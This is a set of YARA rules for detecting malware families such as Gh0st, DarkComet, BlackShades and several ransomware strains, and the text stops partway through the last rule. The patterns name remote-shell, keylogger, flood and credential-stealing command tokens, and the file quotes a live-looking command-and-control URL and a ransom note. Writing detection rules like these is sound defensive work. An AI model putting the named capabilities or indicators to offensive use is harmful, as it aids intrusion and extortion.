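rule Win32FertgerHavex
{
    meta:
        Author      = "BAE Systems"
        Date        = "2014/06/23"
        Description = "Rule for identifying Fertger version of HAVEX"
        Reference   = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $mz = "MZ"
        $a1 = "\\\\.\\pipe\\mypipe-f" wide
        $a2 = "\\\\.\\pipe\\mypipe-h" wide
        $a3 = "\\qln.dbx" wide
        $a4 = "*.yls" wide
        $a5 = "\\*.xmd" wide
        $a6 = "fertger" wide
        $a7 = "havex"

    condition:
        $mz at 0 and 3 of ($a*)
}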
// https://otx.alienvault.com/pulse/5640d95e67db8c7a156aeaaa
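// Gholee v1 DLL: sandbox-evasion build tag plus the family name. Fix: missing closing "}".
rule MW_gholee_v1 : v1
{
    meta:
        Author = "@GelosSnake"
        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
        date = "2014-08"
        maltype = "Remote Access Trojan"
        sample_filetype = "dll"
        hash0 = "48573a150562c57742230583456b4c02"

    strings:
        $a = "sandbox_avg10_vc9_SP1_2011"
        $b = "gholee"

    condition:
        all of them
}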
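// Gholee v2 DLL. The string set is largely generic compiler/resource residue, so the
// condition requires all 18 defined strings (numbering skips 14).
// Fix: missing closing "}".
rule MW_gholee_v2 : v2
{
    meta:
        author = "@GelosSnake"
        date = "2015-02-12"
        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
        hash0 = "05523761ca296ec09afdf79477e5f18d"
        hash1 = "08e424ac42e6efa361eccefdf3c13b21"
        hash2 = "5730f925145f1a1cd8380197e01d9e06"
        hash3 = "73461c8578dd9ab86d42984f30c04610"
        sample_filetype = "dll"
    strings:
        $string0 = "RichHa"
        $string1 = "         (((((                  H" wide
        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
        $string3 = "<8;$O' "
        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
        $string6 = "urn:schemas-microsoft-com:asm.v1"
        $string7 = "8.848H8O8i8s8y8"
        $string8 = "wrapper3" wide
        $string9 = "pwwwwwwww"
        $string10 = "Sunday"
        $string11 = "YYuTVWh"
        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
        $string15 = "wrapper3 Version 1.0" wide
        $string16 = "77A779"
        $string17 = "<C<G<M<R<X<"
        $string18 = "9 9-9N9X9s9"
    condition:
        // 18 strings are defined, so this is equivalent to "all of them"
        18 of them
}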
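// Gholee v2 — same string set and condition as MW_gholee_v2 above, kept under its
// original name. Fix: missing closing "}".
rule gholeeV2
{
    meta:
        Author = "@GelosSnake"
        Date = "2015-02-12"
        // NOTE(review): text duplicates gholeeV1's description although this is the v2 rule
        Description = "Gholee first discovered variant "
        Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"

    strings:
        $string0 = "RichHa"
        $string1 = "         (((((                  H" wide
        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
        $string3 = "<8;$O' "
        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
        $string6 = "urn:schemas-microsoft-com:asm.v1"
        $string7 = "8.848H8O8i8s8y8"
        $string8 = "wrapper3" wide
        $string9 = "pwwwwwwww"
        $string10 = "Sunday"
        $string11 = "YYuTVWh"
        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
        $string15 = "wrapper3 Version 1.0" wide
        $string16 = "77A779"
        $string17 = "<C<G<M<R<X<"
        $string18 = "9 9-9N9X9s9"

    condition:
        // 18 strings are defined, so this is equivalent to "all of them"
        18 of them
}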
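// Gholee v1 — same two strings as MW_gholee_v1 above. Fix: missing closing "}".
rule gholeeV1
{
    meta:
        Author = "@GelosSnake"
        Date = "2014/08"
        Description = "Gholee first discovered variant "
        Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"

    strings:
        $a = "sandbox_avg10_vc9_SP1_2011"
        $b = "gholee"

    condition:
        all of them
}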
// https://otx.alienvault.com/pulse/581916f4aa96ef71368c8e47
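// Gh0st RAT: zlib 1.1.4 banners, API names and dialog resource IDs typical of the
// server component; all must be present. The "(X)" regex form is the author's idiom
// for keeping the literal out of the rule file itself. Fix: missing closing "}".
rule Gh0st : RAT
{
    meta:
        description = "Gh0st"
        author = "botherder https://github.com/botherder"

    strings:
        $ = /(G)host/
        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
        $ = /(%)s\\shell\\open\\command/
        $ = /(G)etClipboardData/
        $ = /(W)riteProcessMemory/
        $ = /(A)djustTokenPrivileges/
        $ = /(W)inSta0\\Default/
        $ = /(#)32770/
        $ = /(#)32771/
        $ = /(#)32772/
        $ = /(#)32774/

    condition:
        all of them
}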
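// Gh0st RAT traffic/update marker: "Gh0st" followed 8 bytes later by a zlib header
// (78 9C), or the update command string. Fix: missing closing "}".
rule gh0st
{
    meta:
        author = "https://github.com/jackcr/"

    strings:
        $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
        $b = "Gh0st Update"

    condition:
        any of them
}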
      
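// Gh0st RAT server DLL: zlib banner, capability API names, the SSDT-reset function
// and the "Global\..." event-name format; all required. Fix: missing closing "}".
rule APT_WIN_Gh0st_ver : RAT
{
    meta:
        author = "@BryanNolen"
        date = "2012-12"
        type = "APT"
        version = "1.1"
        ref = "Detection of Gh0st RAT server DLL component"
        ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
    strings:
        $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
        $capability = "GetClipboardData"
        $capability1 = "capCreateCaptureWindowA"
        $capability2 = "CreateRemoteThread"
        $capability3 = "WriteProcessMemory"
        $capability4 = "LsaRetrievePrivateData"
        $capability5 = "AdjustTokenPrivileges"
        $function = "ResetSSDT"
        $window = "WinSta0\\Default"
        $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* "Global\" ... " %d" */
    condition:
        all of them
}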
// https://otx.alienvault.com/pulse/58da29d4a8a1d40414b5f839
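// Flying Kitten installer: decoy Intel file names plus an MSCF (cabinet) header.
// Fixes: missing closing "}"; stray blank line between every statement removed.
rule CrowdStrike_CSIT_14003_03 : installer
{
    meta:
        copyright = "CrowdStrike, Inc"
        description = "Flying Kitten Installer"
        version = "1.0"
        actor = "FLYING KITTEN"
        in_the_wild = true

    strings:
        $exename = "IntelRapidStart.exe"
        $confname = "IntelRapidStart.exe.config"
        // "MSCF" cabinet signature followed by the reserved zero dword
        $cabhdr = { 4d 53 43 46 00 00 00 00 }

    condition:
        all of them
}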
      
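// Flying Kitten "Stealer" RAT: resource/PDB names in a .NET PE executable (not a DLL).
// Fix: missing closing "}"; the header checks are split out and annotated.
rule FlyingKitten : rat
{
    meta:
        Author      = "CrowdStrike, Inc"
        Date        = "2014/05/13"
        Description = "Flying Kitten RAT"
        Reference   = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"

    strings:
        $classpath = "Stealer.Properties.Resources.resources"
        $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"

    condition:
        all of them and
        // "MZ" and "PE\0\0" (e_lfanew at 0x3c points at the PE signature)
        uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and
        // FileHeader.Characteristics (PE sig + 0x16) without IMAGE_FILE_DLL (0x2000)
        uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and
        // Optional-header Magic PE32 (0x010b) / PE32+ (0x020b) and a non-zero
        // CLR runtime header directory (data directory 14) at the matching offset
        ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or
         (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0))
}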
      
// https://otx.alienvault.com/pulse/5567543db45ff5037f003f9d
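// DarkComet RAT executables: command/marker strings from the 2.x builds ($a*) or
// from 3.x-5.x builds ($b*); a complete group is required. Fix: missing closing "}".
rule DarkComet_3 : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/DarkComet"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        // Versions 2x
        $a1 = "#BOT#URLUpdate"
        $a2 = "Command successfully executed!"
        $a3 = "MUTEXNAME" wide
        $a4 = "NETDATA" wide
        // Versions 3x & 4x & 5x
        $b1 = "FastMM Borland Edition"
        $b2 = "%s, ClassID: %s"
        $b3 = "I wasn't able to open the hosts file"
        $b4 = "#BOT#VisitUrl"
        $b5 = "#KCMDDC"
    condition:
        all of ($a*) or all of ($b*)
}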
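// DarkComet RAT in memory: config block delimiters, mutex prefix or the keepalive
// command tokens; any one is enough. Fix: missing closing "}".
rule DarkComet_2 : rat
{
    meta:
        description = "DarkComet"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"

    strings:
        $a = "#BEGIN DARKCOMET DATA --"
        $b = "#EOF DARKCOMET DATA --"
        $c = "DC_MUTEX-"
        $k1 = "#KCMDDC5#-890"
        $k2 = "#KCMDDC51#-890"

    condition:
        any of them
}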
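// DarkComet RAT: command identifiers and the self-delete batch fragment; all required.
// Fix: missing closing "}".
rule DarkComet_4 : RAT
{
    meta:
        reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara"
    strings:
        $a1 = "#BOT#"
        $a2 = "WEBCAMSTOP"
        $a3 = "UnActiveOnlineKeyStrokes"
        $a4 = "#SendTaskMgr"
        $a5 = "#RemoteScreenSize"
        $a6 = "ping 127.0.0.1 -n 4 > NUL &&"
    condition:
        all of them
}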
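// DarkComet RAT, host-log rule: a Security-Auditing 4688 (process creation) event whose
// path is under %LOCALAPPDATA%\Temp\MSDCSC, or a 4674 event naming a DC_MUTEX-xxxxxxx
// object. The string pairs are not tied to the same event record by the condition.
// Fix: missing closing "}".
rule DarkComet_5
{
    meta:
        maltype = "DarkComet RAT"
        author = "https://github.com/reed1713"
        description = "Malware creates the MSDCSC directory, which is a common path utilized by DarkComet, as well as the mutex pattern."
    strings:
        $type="Microsoft-Windows-Security-Auditing"
        $eventid="4688"
        $data=/AppData\\Local\\Temp\\MSDCSC\\.+\.exe/

        $type1="Microsoft-Windows-Security-Auditing"
        $eventid1="4674"
        $data1=/DC_MUTEX-[0-9A-Z]{7}/
    condition:
        ($type and $eventid and $data) or ($type1 and $eventid1 and $data1)
}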
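// DarkComet RAT: bot commands, DDoS, keylogger and remote-shell command tokens; four
// bot commands or one complete feature group is required. Fix: missing closing "}".
rule DarkComet_1 : RAT
{
    meta:
        description = "DarkComet RAT"
        author = "botherder https://github.com/botherder"

    strings:
        $bot1 = /(#)BOT#OpenUrl/ wide ascii
        $bot2 = /(#)BOT#Ping/ wide ascii
        $bot3 = /(#)BOT#RunPrompt/ wide ascii
        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
        $bot5 = /(#)BOT#URLDownload/ wide ascii
        $bot6 = /(#)BOT#URLUpdate/ wide ascii
        $bot7 = /(#)BOT#VisitUrl/ wide ascii
        $bot8 = /(#)BOT#CloseServer/ wide ascii

        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii

        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii

        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
        $shell3 = /(K)ILLREMOTESHELL/ wide ascii

    condition:
        4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
}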
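// DarkComet keystroke log file: starts with "::" and contains more than ten
// ":: <Window>" entry headers and more than ten "(h:mm:ss AM/PM)" timestamps.
// Fix: missing closing "}".
rule DarkComet_Keylogger_File : RAT
{
    meta:
        author = "Florian Roth"
        description = "Looks like a keylogger file created by DarkComet Malware"
        date = "25.07.14"
        reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
        score = 50
    strings:
        $magic = "::"
        $entry = /\n:: [A-Z]/
        $timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/
    condition:
        // #entry / #timestamp are match counts, not booleans
        ($magic at 0) and #entry > 10 and #timestamp > 10
}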
// https://otx.alienvault.com/pulse/5950d63b4797aa61b789b43f
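// CyberGate RAT executables: "####@####"-delimited config markers and component
// names, plus one of the two resource separators. Fix: missing closing "}".
rule CyberGate : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/CyberGate"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        // "####@####" + encoded payload + "####@####"
        $string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23}
        $string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23}
        $string3 = "EditSvr"
        $string4 = "TLoader"
        $string5 = "Stroks"
        $string6 = "####@####"
        $res1 = "XX-XX-XX-XX"
        $res2 = "CG-CG-CG-CG"

    condition:
        all of ($string*) and any of ($res*)
}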
// https://otx.alienvault.com/pulse/5977be97481b4c644ff5f812
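// Crimson RAT (Java): class-path entries as they appear in the JAR's central directory
// (hence the trailing "PK"); all five required. Fix: missing closing "}".
rule Crimson: RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        Description = "Crimson Rat"
        date = "2015/05"
        ref = "http://malwareconfig.com/stats/Crimson"
        maltype = "Remote Access Trojan"
        filetype = "jar"

    strings:
        $a1 = "com/crimson/PK"
        $a2 = "com/crimson/bootstrapJar/PK"
        $a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK"
        $a4 = "com/crimson/universal/containers/KeyloggerLog.classPK"
        $a5 = "com/crimson/universal/UploadTransfer.classPK"

    condition:
        all of ($a*)
}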
// https://otx.alienvault.com/pulse/5977bd44a87db7669ccaeee0
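// Cerberus RAT in memory: protocol check-in/ping tokens or the family name.
// Fix: missing closing "}".
rule Cerberus : RAT memory
{
    meta:
        description = "Cerberus"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"

    strings:
        $checkin = "Ypmw1Syv023QZD"
        $clientpong = "wZ2pla"
        $serverping = "wBmpf3Pb7RJe"
        // NOTE(review): "cerberus" nocase alone satisfies the condition; expect hits on
        // unrelated software using the name — triage those against the protocol tokens.
        $generic = "cerberus" nocase

    condition:
        any of them
}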
// https://otx.alienvault.com/pulse/5896576700f3d31cddc29874
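// Bozok RAT executables: command handler names plus the resolver import; all required,
// which keeps the generic "gethostbyname" from matching on its own.
// Fix: missing closing "}".
rule Bozok : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Bozok"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "getVer" nocase
        $b = "StartVNC" nocase
        $c = "SendCamList" nocase
        $d = "untPlugin" nocase
        $e = "gethostbyname" nocase

    condition:
        all of them
}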
// https://otx.alienvault.com/pulse/5977ba6af7cda569f357bdba
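// Bolonyokte (.NET RAT) in memory: campaign names, decoy document names, dropped
// artefacts, function names and e-banking keywords. Fix: missing closing "}".
rule Bolonyokte : rat
{
    meta:
        description = "UnknownDotNet RAT - Bolonyokte"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-02-01"
        filetype = "memory"
        version = "1.0"

    strings:
        $campaign1 = "Bolonyokte" ascii wide
        $campaign2 = "donadoni" ascii wide

        $decoy1 = "nyse.com" ascii wide
        $decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
        $decoy3 = "bf13-5d45cb40" ascii wide

        // NOTE(review): artifact4-6 are common web-server file names; two of them
        // alone satisfy the condition.
        $artifact1 = "Backup.zip"  ascii wide
        $artifact2 = "updates.txt" ascii wide
        $artifact3 = "vdirs.dat" ascii wide
        $artifact4 = "default.dat"
        $artifact5 = "index.html"
        $artifact6 = "mime.dat"

        $func1 = "FtpUrl"
        $func2 = "ScreenCapture"
        $func3 = "CaptureMouse"
        $func4 = "UploadFile"

        // NOTE(review): $ebanking2/3/7 are written as text strings, so "(A)|(B)" is
        // matched literally, parentheses and pipe included — they look like regexes that
        // were meant to be /.../ patterns. "login" and "Power" are also very generic for a
        // 3-of condition. Left as authored; confirm intent before tightening.
        $ebanking1 = "Internet Banking" wide
        $ebanking2 = "(Online Banking)|(Online banking)"
        $ebanking3 = "(e-banking)|(e-Banking)" nocase
        $ebanking4 = "login"
        $ebanking5 = "en ligne" wide
        $ebanking6 = "bancaires" wide
        $ebanking7 = "(eBanking)|(Ebanking)" wide
        $ebanking8 = "Anmeldung" wide
        $ebanking9 = "internet banking" nocase wide
        $ebanking10 = "Banking Online" nocase wide
        $ebanking11 = "Web Banking" wide
        $ebanking12 = "Power"

    condition:
        any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
}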
// https://otx.alienvault.com/pulse/5977ba01481b4c60c1f5f813
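// BlackShades RAT in memory: UTF-16 "Blackshades", an encoded blob, the
// bss_server/CLICK_DELAY/modInjPE markers or the embedded API key.
// Fix: missing closing "}".
rule BlackShades_4 : rat
{
    meta:
        description = "BlackShades"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"

    strings:
        // "Blackshades" as UTF-16LE
        $a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
        $b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
        // "bss_server"
        $c = { 62 73 73 5F 73 65 72 76 65 72 }
        // "CLICK_DELAY\0SCK_ID"
        $d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
        // "modInjPE"
        $e = { 6D 6F 64 49 6E 6A 50 45 }
        $apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"

    condition:
        any of ($a, $b, $c, $d, $e) or $apikey
}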
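// BlackShades server: bss_server, CLICK_DELAY/SCK_ID and modInjPE markers, all required.
// Fix: missing closing "}".
rule BlackShades : Trojan
{
    meta:
        author="Kevin Falcoz"
        date="26/06/2013"
        description="BlackShades Server"

    strings:
        $signature1={62 73 73 5F 73 65 72 76 65 72}                              // "bss_server"
        $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}     // "CLICK_DELAY\0SCK_ID"
        $signature3={6D 6F 64 49 6E 6A 50 45}                                    // "modInjPE"

    condition:
        $signature1 and $signature2 and $signature3
}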
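// BlackShades server — identical strings and condition to rule BlackShades above,
// differing only in name and tags. Fix: missing closing "}".
rule BlackShades2 : Trojan RAT
{
    meta:
        author="Kevin Falcoz"
        date="26/06/2013"
        description="BlackShades Server"

    strings:
        $signature1={62 73 73 5F 73 65 72 76 65 72}                              // "bss_server"
        $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}     // "CLICK_DELAY\0SCK_ID"
        $signature3={6D 6F 64 49 6E 6A 50 45}                                    // "modInjPE"

    condition:
        $signature1 and $signature2 and $signature3
}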
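// BlackShades RAT: VB module (mod*) and timer (tmr*) names from the client; ten from
// either group are required. Fix: missing closing "}".
rule BlackShades_3 : Trojan RAT
{
    meta:
        description = "BlackShades RAT"
        author = "botherder https://github.com/botherder"

    strings:
        $mod1 = /(m)odAPI/
        $mod2 = /(m)odAudio/
        $mod3 = /(m)odBtKiller/
        $mod4 = /(m)odCrypt/
        $mod5 = /(m)odFuctions/
        $mod6 = /(m)odHijack/
        $mod7 = /(m)odICallBack/
        $mod8 = /(m)odIInet/
        $mod9 = /(m)odInfect/
        $mod10 = /(m)odInjPE/
        $mod11 = /(m)odLaunchWeb/
        $mod12 = /(m)odOS/
        $mod13 = /(m)odPWs/
        $mod14 = /(m)odRegistry/
        $mod15 = /(m)odScreencap/
        $mod16 = /(m)odSniff/
        $mod17 = /(m)odSocketMaster/
        $mod18 = /(m)odSpread/
        $mod19 = /(m)odSqueezer/
        $mod20 = /(m)odSS/
        $mod21 = /(m)odTorrentSeed/

        $tmr1 = /(t)mrAlarms/
        $tmr2 = /(t)mrAlive/
        $tmr3 = /(t)mrAnslut/
        $tmr4 = /(t)mrAudio/
        $tmr5 = /(t)mrBlink/
        $tmr6 = /(t)mrCheck/
        $tmr7 = /(t)mrCountdown/
        $tmr8 = /(t)mrCrazy/
        $tmr9 = /(t)mrDOS/
        $tmr10 = /(t)mrDoWork/
        $tmr11 = /(t)mrFocus/
        $tmr12 = /(t)mrGrabber/
        $tmr13 = /(t)mrInaktivitet/
        $tmr14 = /(t)mrInfoTO/
        $tmr15 = /(t)mrIntervalUpdate/
        $tmr16 = /(t)mrLiveLogger/
        $tmr17 = /(t)mrPersistant/
        $tmr18 = /(t)mrScreenshot/
        $tmr19 = /(t)mrSpara/
        $tmr20 = /(t)mrSprid/
        $tmr21 = /(t)mrTCP/
        $tmr22 = /(t)mrUDP/
        $tmr23 = /(t)mrWebHide/

    condition:
        10 of ($mod*) or 10 of ($tmr*)
}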
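// BlackShades: server marker, chat control name and flood command; all required.
// Fix: missing closing "}".
rule BlackShades_25052015
{
    meta:
        author = "Brian Wallace (@botnet_hunter)"
        date = "2014/04"
        // NOTE(review): duplicate "ref" key; the first points at the PoisonIvy stats page,
        // which looks like a copy/paste leftover. Kept as authored.
        ref = "http://malwareconfig.com/stats/PoisonIvy"
        ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
        family = "blackshades"

    strings:
        $string1 = "bss_server"
        $string2 = "txtChat"
        $string3 = "UDPFlood"
    condition:
        all of them
}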
// https://otx.alienvault.com/pulse/5667d30a67db8c0fd9b05c3a
rule Adzok : binary RAT Adzok
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        Description = "Adzok Rat"
        Versions = "Free 1.0.0.3,"
        date = "2015/05"
        ref = "http://malwareconfig.com/stats/Adzok"
        maltype = "Remote Access Trojan"
        filetype = "jar"

    strings:
        // Archive entry names followed by "PK" -- presumably the start of the next
        // ZIP header signature immediately after the name (filetype is "jar"); confirm.
        $a1 = "config.xmlPK"
        $a2 = "key.classPK"
        $a3 = "svd$1.classPK"
        $a4 = "svd$2.classPK"
        $a5 = "Mensaje.classPK"
        $a6 = "inic$ShutdownHook.class"
        $a7 = "Uninstall.jarPK"
        $a8 = "resources/icono.pngPK"

    condition:
        // every string is an $a* string, so this equals "7 of ($a*)":
        // at most one of the eight entries may be missing
        7 of them
}
// https://otx.alienvault.com/pulse/5977b89ba87db76356caeee0
rule CryptoLocker_set1
{
    meta:
        author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
        date = "2014-04-13"
        description = "Detection of Cryptolocker Samples"

    strings:
        // Several entries (CompanyName, ProductVersion, VS_VERSION_INFO, manifest
        // fragments) also occur in ordinary Windows executables with a version
        // resource; the 12-of-18 threshold below is what carries the specificity.
        $s0 = "static"
        $s1 = " kscdS"
        $s2 = "Romantic"
        $s3 = "CompanyName" wide
        $s4 = "ProductVersion" wide
        $s5 = "9%9R9f9q9"
        $s6 = "IDR_VERSION1" wide
        $s7 = "  </trustInfo>"
        $s8 = "LookFor" wide
        $s9 = ":n;t;y;"
        $s10 = "        <requestedExecutionLevel level"
        $s11 = "VS_VERSION_INFO" wide
        $s12 = "2.0.1.0" wide
        $s13 = "<assembly xmlns"
        $s14 = "  <trustInfo xmlns"
        $s15 = "srtWd@@"
        $s16 = "515]5z5"
        $s17 = "C:\\lZbvnoVe.exe" wide    // hard-coded executable path, the most specific artefact here

    condition:
        // identifiers were renamed from $string* to $s*; the threshold is unchanged
        12 of ($s*)
}
rule CryptoLocker_rule2
{
    meta:
        author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
        date = "2014-04-14"
        description = "Detection of CryptoLocker Variants"

    strings:
        // Mix of version-resource / manifest fragments (common to many PEs) and a
        // few variant-specific tokens; 12 of 17 must match.
        $s0 = "2.0.1.7" wide
        $s1 = "    <security>"
        $s2 = "Romantic"
        $s3 = "ProductVersion" wide
        $s4 = "9%9R9f9q9"
        $s5 = "IDR_VERSION1" wide
        $s6 = "button"
        $s7 = "    </security>"
        $s8 = "VFileInfo" wide
        $s9 = "LookFor" wide
        $s10 = "      </requestedPrivileges>"
        $s11 = " uiAccess"
        $s12 = "  <trustInfo xmlns"
        $s13 = "last.inf"
        $s14 = " manifestVersion"
        $s15 = "FFFF04E3" wide
        $s16 = "3,31363H3P3m3u3z3"

    condition:
        // identifiers were renamed from $string* to $s*; the threshold is unchanged
        12 of ($s*)
}
rule Ransom_Satana
{
    meta:
        description = "Regla para detectar Ransom.Satana"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        $a = { 21 00 73 00 61 00 74 00 61 00 6E 00 61 00 21 00 2E 00 74 00 78 00 74 00 00 }   // "!satana!.txt" as UTF-16LE plus one trailing 00
        $b = { 74 67 77 79 75 67 77 71 }                                                       // "tgwyugwq"
        $c = { 53 77 76 77 6E 67 75 }                                                          // "Swvwngu"
        $d = { 45 6E 75 6D 4C 6F 63 61 6C 52 65 73 }                                           // "EnumLocalRes"
        $e = { 57 4E 65 74 4F 70 65 6E 45 6E 75 6D 57 00 }                                     // "WNetOpenEnumW" + 00
        $f = { 21 53 41 54 41 4E 41 21 }                                                       // "!SATANA!"

    condition:
        // Parentheses make the existing precedence explicit ("and" binds tighter
        // than "or"): the 8-byte $b on its own is sufficient for a hit, the other
        // five strings are only needed together when $b is absent.
        // NOTE(review): if "($b or $c) and ..." was intended, $b alone is a
        // low-confidence trigger -- confirm with the author before changing.
        $b or ($c and $d and $a and $e and $f)
}
rule legion_777
{
    meta:
        author = "Daxda (https://github.com/Daxda)"
        date = "2016/6/6"
        description = "Detects an UPX-unpacked .777 ransomware binary."
        ref = "https://github.com/Daxda/malware-analysis/tree/master/malware_samples/legion"
        category = "Ransomware"
        sample = "SHA256: 14d22359e76cf63bf17268cad24bac03663c8b2b8028b869f5cec10fe3f75548"

    strings:
        $s1 = "http://tuginsaat.com/wp-content/themes/twentythirteen/stats.php"
        $s2 = "read_this_file.txt" wide                          // Ransom note filename.
        $s3 = "seven_legion@india.com"                           // Part of the format string used to rename files.
        // Ransom note content, written as a text string instead of the original
        // hex sequence (same bytes; \x0d\x0a are the CR/LF pairs). Note that $s3
        // is a substring of this one, so a file hitting $s4 also hits $s3.
        $s4 = "FOR DECRYPT FILES\x0d\x0aSEND ONE FILE IN E-MAIL\x0d\x0aseven_legion@india.com"
        $s5 = "%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777"       // Renaming format string.

    condition:
        // all strings are $s* strings, so this is the same as "4 of ($s*)"
        4 of them
}
rule Ransom_Satana_Dropper
{
    meta:
        description = "Regla para detectar el dropper de Ransom.Satana"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        $a = { 25 73 2D 54 72 79 45 78 63 65 70 74 }    // "%s-TryExcept"
        // "d:\lbetwmwy\uijeuqplfwub.pdb" -- a debug-symbol path left in the binary
        $b = { 64 3A 5C 6C 62 65 74 77 6D 77 79 5C 75 69 6A 65 75 71 70 6C 66 77 75 62 2E 70 64 62 }
        $c = { 71 66 6E 74 76 74 68 62 }                // "qfntvthb"

    condition:
        // all three must be present (equivalent to "all of them")
        $a and $b and $c
}
rule Ransom_Alfa
{
    meta:
        description = "Regla para detectar W32/Filecoder.Alfa (Posibles falsos positivos)"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        // Two code-byte sequences; the description itself warns of possible false positives.
        $a = { 8B 0C 97 81 E1 FF FF 00 00 81 F9 19 04 00 00 74 0F 81 F9 }
        $b = { 22 04 00 00 74 07 42 3B D0 7C E2 EB 02 }

    condition:
        // both sequences are required (equivalent to "all of them")
        $a and $b
}
rule BackdoorFCKG: CTB_Locker_Ransomware
{
    meta:
        author = "ISG"
        date = "2015-01-20"
        reference = "https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker"
        description = "CTB_Locker"

    strings:
        // $string1 below was spelled "$stringl" (lower-case L) in the original;
        // renamed for consistency, the condition does not reference it by name.
        // NOTE(review): $string0 appears to be a shorter run of 'A' than the one
        // inside $string1, so any file hitting $string1 also hits $string0 and the
        // "3 of them" threshold effectively needs only one more string -- confirm.
        $string0 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
